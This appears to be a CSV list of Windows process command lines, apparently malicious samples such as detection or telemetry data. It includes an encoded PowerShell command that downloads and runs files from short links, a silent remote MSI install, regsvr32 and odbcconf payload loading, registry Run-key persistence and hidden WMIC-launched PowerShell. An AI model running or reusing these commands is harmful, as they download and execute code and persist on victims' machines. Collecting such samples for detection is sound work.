"C:\Windows\System32\conhost.exe","""C:\Windows\system32\conhost.exe"" ""powershell.exe -encodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAFIASQAgAGgAdAB0AHAAcwA6AC8ALwB0AC4AbAB5AC8AdwAtAHIAdwAgAC0ATwB1AHQARgBpAGwAZQAgACUAVABlAG0AcAAlAFwAYQAuAGUAeABlACAAJgAmACAAcwB0AGEAcgB0ACAAJQBUAGUAbQBwACUAXABhAC4AZQB4AGUAIAAmACYAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAaAB0AHQAcABzADoALwAvAHQALgBsAHkALwB1AEoAdwBJADcAIAAtAE8AdQB0AEYAaQBsAGUAIAAlAFQAZQBtAHAAJQBcAGEALgBwAGQAZgAgACYAJgAgAHMAdABhAHIAdAAgACUAVABlAG0AcAAlAFwAYQAuAHAAZABmAA==""","C:\Users\user\Desktop\",1
"C:\Windows\System32\bitsadmin.exe","""C:\Windows\system32\bitsadmin.exe"" ","c:\",1
"C:\Windows\System32\regsvr32.exe","""C:\Windows\System32\regsvr32.exe"" data\assets\images\L7sh.dat","C:\Users\user\Desktop\",1
"C:\Windows\System32\regsvr32.exe","""C:\Windows\System32\regsvr32.exe"" data\assets\images\jSRV.dat","C:\Users\user\Desktop\",1
"C:\Program Files (x86)\Internet Explorer\iexplore.exe","""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" http://down.file-down.co.kr/filedownloader/advert/urla.asp?q=&code=filedoumi&srl=http://www.barogagy.co.kr/","C:\Users\user\Desktop\",1
"C:\Windows\System32\msiexec.exe","""C:\Windows\System32\msiexec.exe"" /quiet /i http://fileapi.ru-file.info/photo_viewer.msi","C:\Windows\System32\",1
"C:\Windows\System32\odbcconf.exe","""C:\Windows\System32\odbcconf.exe"" /a {REGSVR GfsFepFIKsNGpt.dll}","C:\Users\user\Desktop\",1
"C:\Windows\System32\runas.exe","""C:\Windows\System32\runas.exe"" /trustlevel:0x20000 ""cmd /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v NGLA /t REG_SZ /d \""C:\Users\Public\Documents\NGLA\svchongl.exe\"" /f""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wbem\WMIC.exe","""C:\Windows\System32\wbem\WMIC.exe"" ProCESs cAll ""CREATe"" ""PoWeRSHELl -wIndO HIDdE $path=($pwd).path;start $path'\test.jpg';start $path'\test.jpg'""","C:\Users\user\Desktop\",1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment